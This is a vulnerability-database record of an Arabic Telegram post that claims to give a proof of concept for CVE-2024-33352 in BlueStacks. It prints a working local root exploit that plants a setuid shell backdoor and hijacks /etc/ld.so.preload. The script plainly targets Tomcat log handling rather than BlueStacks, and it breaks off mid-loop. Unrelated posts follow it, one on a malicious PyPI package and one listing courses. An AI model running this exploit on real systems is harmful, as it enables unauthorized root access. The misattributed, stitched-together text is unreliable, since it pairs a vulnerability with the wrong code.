{"uuid": "38ae3309-c519-4649-abb4-0515d15de5ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "published-proof-of-concept", "source": "https://t.me/cyber_hsecurity/1611", "content": "\u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 CVE-2024-33352 \u062a\u0624\u062b\u0631 \u0639\u0644\u0649 BlueStacks\u060c \u0648\u0647\u0648 \u0645\u062d\u0627\u0643\u064a \u0623\u0646\u062f\u0631\u0648\u064a\u062f \u0634\u0627\u0626\u0639 \u064a\u0633\u062a\u062e\u062f\u0645 \u0644\u062a\u0634\u063a\u064a\u0644 \u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0627\u0644\u0623\u0646\u062f\u0631\u0648\u064a\u062f \u0639\u0644\u0649 \u0627\u0644\u062d\u0648\u0627\u0633\u064a\u0628 \u0627\u0644\u0634\u062e\u0635\u064a\u0629. \u062a\u0645 \u0627\u0643\u062a\u0634\u0627\u0641 \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629 \u0645\u0646 \u0642\u0628\u0644 \u0627\u0644\u0628\u0627\u062d\u062b mmiszczyk \u0648\u062a\u0645 \u0646\u0634\u0631 \u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645 (PoC) \u0639\u0644\u0649 GitHub. \u062a\u062a\u0639\u0644\u0642 \u0627\u0644\u062b\u063a\u0631\u0629 \u0628\u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0639\u0628\u0631 \u0632\u0631\u0639 \u0628\u0631\u0646\u0627\u0645\u062c \u0636\u0627\u0631 \u0641\u064a \u0627\u0644\u062c\u0647\u0627\u0632 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a (VM) \u0627\u0644\u062e\u0627\u0635 \u0628\u0640 BlueStacks\u060c \u0645\u0645\u0627 \u064a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0628\u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0627\u0644\u062c\u0630\u0631 (root) \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641.\n\n### \u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644 \u0627\u0644\u0641\u0646\u064a\u0629\n\n\u062a\u0639\u062a\u0645\u062f \u0627\u0644\u062b\u063a\u0631\u0629 \u0639\u0644\u0649 \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0645\u064a\u0632\u0627\u062a \u0645\u062d\u062f\u062f\u0629 \u0641\u064a BlueStacks \u0644\u0632\u0631\u0639 \u0628\u0631\u0627\u0645\u062c \u0636\u0627\u0631\u0629 \u0641\u064a \u0627\u0644\u062c\u0647\u0627\u0632 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u060c \u0645\u0645\u0627 \u064a\u0624\u062f\u064a \u0625\u0644\u0649 \u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a. \u0647\u0630\u0627 \u064a\u0645\u0643\u0646 \u0623\u0646 \u064a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0628\u0627\u0644\u0633\u064a\u0637\u0631\u0629 \u0627\u0644\u0643\u0627\u0645\u0644\u0629 \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641.\n\n### \u0643\u064a\u0641\u064a\u0629 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644\n\n\u0644\u0644\u0627\u0633\u062a\u0641\u0627\u062f\u0629 \u0645\u0646 \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629\u060c \u064a\u062d\u062a\u0627\u062c \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0625\u0644\u0649 \u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641 \u0644\u062a\u0634\u063a\u064a\u0644 \u0646\u0635 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644. \u062a\u0645 \u062a\u0648\u0641\u064a\u0631 \u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645 (PoC) \u0645\u0646 \u0642\u0628\u0644 \u0627\u0644\u0628\u0627\u062d\u062b\u060c \u0648\u0627\u0644\u0630\u064a \u064a\u0648\u0636\u062d \u0627\u0644\u062e\u0637\u0648\u0627\u062a \u0627\u0644\u0644\u0627\u0632\u0645\u0629 \u0644\u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0647\u062c\u0648\u0645.\n\n#### \u062e\u0637\u0648\u0627\u062a \u0627\u0644\u062a\u0646\u0641\u064a\u0630\n\n1. \u062a\u0646\u0632\u064a\u0644 \u0648\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u0646\u0635: \u064a\u0645\u0643\u0646 \u062a\u0646\u0632\u064a\u0644 \u0627\u0644\u0646\u0635 \u0627\u0644\u062e\u0627\u0635 \u0628\u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645 \u0645\u0646 [\u0647\u0646\u0627](https://github.com/mmiszczyk/CVE-2024-33352/blob/main/exploit.sh).\n2. \u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u0646\u0635: \u064a\u062c\u0628 \u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u0646\u0635 \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641 \u0628\u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0645\u0633\u062a\u062e\u062f\u0645 \u0639\u0627\u062f\u064a. \u0627\u0644\u0646\u0635 \u064a\u0642\u0648\u0645 \u0628\u0625\u0639\u062f\u0627\u062f \u0628\u064a\u0626\u0629 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0639\u0646 \u0637\u0631\u064a\u0642 \u0632\u0631\u0639 \u0628\u0631\u0646\u0627\u0645\u062c \u0636\u0627\u0631 \u0641\u064a \u0627\u0644\u062c\u0647\u0627\u0632 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a.\n\n### \u0627\u0644\u0634\u0631\u062d \u0627\u0644\u0641\u0646\u064a \u0644\u0644\u0646\u0635\n\n#!/bin/bash\n# BlueStacks Privilege Escalation Exploit\n# CVE-2024-33352\n\n# \u0625\u0639\u062f\u0627\u062f \u0627\u0644\u0645\u0644\u0641\u0627\u062a \u0627\u0644\u0636\u0631\u0648\u0631\u064a\u0629 \u0644\u0632\u0631\u0639 \u0627\u0644\u0628\u0631\u0646\u0627\u0645\u062c \u0627\u0644\u0636\u0627\u0631\nBACKDOORSH=\"/bin/bash\"\nBACKDOORPATH=\"/tmp/bluestacksrootsh\"\nPRIVESCLIB=\"/tmp/privesclib.so\"\nPRIVESCSRC=\"/tmp/privesclib.c\"\n\nfunction cleanexit {\n # \u062a\u0646\u0638\u064a\u0641 \u0627\u0644\u0645\u0644\u0641\u0627\u062a \u0628\u0639\u062f \u0627\u0644\u0627\u0646\u062a\u0647\u0627\u0621\n echo -e \"\\n[+] Cleaning up...\"\n rm -f $PRIVESCSRC\n rm -f $PRIVESCLIB\n rm -f $TOMCATLOG\n touch $TOMCATLOG\n if [ -f /etc/ld.so.preload ]; then\n echo -n &gt; /etc/ld.so.preload 2&gt;/dev/null\n fi\n echo -e \"\\n[+] Job done. Exiting with code $1 \\n\"\n exit $1\n}\n\n# \u0625\u0639\u062f\u0627\u062f \u0627\u0644\u0628\u0631\u0646\u0627\u0645\u062c \u0627\u0644\u0636\u0627\u0631\ncat &lt;&lt;_solibeof_&gt;$PRIVESCSRC\n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \nuid_t geteuid(void) {\n static uid_t (*old_geteuid)();\n old_geteuid = dlsym(RTLD_NEXT, \"geteuid\");\n if ( old_geteuid() == 0 ) {\n chown(\"$BACKDOORPATH\", 0, 0);\n chmod(\"$BACKDOORPATH\", 04777);\n unlink(\"/etc/ld.so.preload\");\n }\n return old_geteuid();\n}\n_solibeof_\ngcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl\nif [ $? -ne 0 ]; then\n echo -e \"\\n[!] Failed to compile the privesc lib $PRIVESCSRC.\"\n cleanexit 2;\nfi\n\n# \u0625\u0639\u062f\u0627\u062f \u0627\u0644\u062e\u0644\u0641\u064a\u0629/\u0627\u0644\u0642\u0634\u0631\u0629 \u0630\u0627\u062a \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0627\u0644\u0645\u0646\u062e\u0641\u0636\u0629\ncp $BACKDOORSH $BACKDOORPATH\necho -e \"\\n[+] Backdoor/low-priv shell installed at: \\nls -l $BACKDOORPATH\"\n\n# \u0625\u0639\u062f\u0627\u062f \u0627\u0644\u0631\u0627\u0628\u0637 \u0627\u0644\u0631\u0645\u0632\u064a \u0644\u0645\u0644\u0641 ld.so.preload\nrm -f $TOMCATLOG &amp;&amp; ln -s /etc/ld.so.preload $TOMCATLOG\nif [ $? -ne 0 ]; then\n echo -e \"\\n[!] Couldn't remove the $TOMCATLOG file or create a symlink.\"\n cleanexit 3\nfi\necho -e \"\\n[+] Symlink created at: \\nls -l $TOMCATLOG\"\n\n# \u0627\u0644\u0627\u0646\u062a\u0638\u0627\u0631 \u062d\u062a\u0649 \u064a\u062a\u0645 \u0625\u0639\u0627\u062f\u0629 \u0641\u062a\u062d \u0627\u0644\u0633\u062c\u0644\u0627\u062a \u0628\u0648\u0627\u0633\u0637\u0629 Tomcat\necho -ne \"\\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...\"\necho -e \"\\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)\"\nwhile :; do\n sleep 0.1\n if [ -f /etc/ld.so.preload ]; then\n echo $PRIVESCLIB &gt; /etc/ld.so.preload\n break;\n### \u0643\u064a\u0641\u064a\u0629 \u0627\u0644\u062d\u0645\u0627\u064a\u0629\n\n\u0644\u062d\u0645\u0627\u064a\u0629 \u0627\u0644\u0646\u0638\u0627\u0645 \u0645\u0646 \u0647\u0630\u0627 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644\u060c \u064a\u064f\u0646\u0635\u062d \u0628\u062a\u062d\u062f\u064a\u062b BlueStacks \u0625\u0644\u0649 \u0622\u062e\u0631 \u0625\u0635\u062f\u0627\u0631 \u0648\u0627\u0644\u062a\u0623\u0643\u062f \u0645\u0646 \u062a\u0637\u0628\u064a\u0642 \u062c\u0645\u064a\u0639 \u0627\u0644\u062a\u0635\u062d\u064a\u062d\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u0645\u062a\u0627\u062d\u0629. \u0643\u0645\u0627 \u064a\u062c\u0628 \u062f\u0627\u0626\u0645\u064b\u0627 \u0627\u0644\u062d\u0631\u0635 \u0639\u0644\u0649 \u0645\u0631\u0627\u0642\u0628\u0629 \u0627\u0644\u0623\u0646\u0638\u0645\u0629 \u0648\u0627\u0644\u0646\u0634\u0627\u0637\u0627\u062a \u063a\u064a\u0631 \u0627\u0644\u0627\u0639\u062a\u064a\u0627\u062f\u064a\u0629.\n\n### \u0627\u0644\u0645\u0635\u0627\u062f\u0631\n\n- [mmiszczyk/CVE-2024-33352 \u0639\u0644\u0649 GitHub](https://github.com/mmiszczyk/CVE-2024-33352)\n- [\u0625\u062b\u0628\u0627\u062a \u0627\u0644\u0645\u0641\u0647\u0648\u0645 \u0639\u0644\u0649 GitHub](https://github.com/mmiszczyk/CVE-2024-33352/blob/main/exploit.sh)\n\nALSED404:\n\u0627\u062d\u0630\u0631 \u0645\u0646 \u062d\u0632\u0645\u0629 PyPI \"lr-utils-lib\"\u060c \u0641\u0647\u064a \u062a\u0645\u062b\u0644 \u062a\u0647\u062f\u064a\u062f\u064b\u0627 \u062c\u062f\u064a\u062f\u064b\u0627 \u0644\u0645\u0633\u062a\u062e\u062f\u0645\u064a macOS!\n\n\u062a\u0633\u0631\u0642 \u0647\u0630\u0647 \u0627\u0644\u062d\u0632\u0645\u0629 \u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0639\u062a\u0645\u0627\u062f Google Cloud\u060c \u0645\u0645\u0627 \u064a\u0634\u0643\u0644 \u062e\u0637\u0631\u064b\u0627 \u0643\u0628\u064a\u0631\u064b\u0627 \u0639\u0644\u0649 \u0643\u0644 \u0645\u0646 \u0627\u0644\u0645\u0637\u0648\u0631\u064a\u0646 \u0627\u0644\u0623\u0641\u0631\u0627\u062f \u0648\u0627\u0644\u0645\u0624\u0633\u0633\u0627\u062a.\n\n\u0627\u0642\u0631\u0623 \u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644: https://thehackernews.com/2024/07/malicious-pypi-package-targets-macos-to.html\n\nSQL\ud83d\udc7d:\n\u0625\u0644\u064a\u0643 \u0628\u0639\u0636 \u0627\u0644\u0643\u0648\u0631\u0633\u0627\u062a \u0627\u0644\u062a\u064a \u062a\u0631\u0643\u0632 \u0639\u0644\u0649 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0648\u0643\u064a\u0641\u064a\u0629 \u0627\u0643\u062a\u0634\u0627\u0641\u0647\u0627 \u0648\u0625\u0635\u0644\u0627\u062d\u0647\u0627\u060c \u0645\u0639 \u0628\u0639\u0636 \u0627\u0644\u0645\u0635\u0627\u062f\u0631 \u0627\u0644\u0645\u0647\u0645\u0629 \u0641\u064a \u0647\u0630\u0627 \u0627\u0644\u0645\u062c\u0627\u0644:\n\n### \u062f\u0648\u0631\u0627\u062a \u0628\u0627\u0644\u0644\u063a\u0629 \u0627\u0644\u0639\u0631\u0628\u064a\u0629:\n\n1. \u062f\u0648\u0631\u0629 \u0627\u0644\u0642\u0631\u0635\u0646\u0629 \u0627\u0644\u0623\u062e\u0644\u0627\u0642\u064a\u0629 \u0648\u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629:\n   - \u0645\u0646\u0635\u0629: \u0623\u0643\u0627\u062f\u064a\u0645\u064a\u0629 \u0627\u0644\u0632\u064a\u0631\u0648\n   - \u062a\u063a\u0637\u064a \u0627\u0644\u062f\u0648\u0631\u0629 \u0643\u064a\u0641\u064a\u0629 \u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0648\u0627\u062e\u062a\u0628\u0627\u0631 \u0627\u0644\u0623\u0645\u0627\u0646 \u0641\u064a \u0627\u0644\u0623\u0646\u0638\u0645\u0629.\n   - [\u0631\u0627\u0628\u0637 \u0627\u0644\u062f\u0648\u0631\u0629](https://www.elzero.org/courses/ethical-hacking/)", "creation_timestamp": "2024-12-13T19:00:22.000000Z"}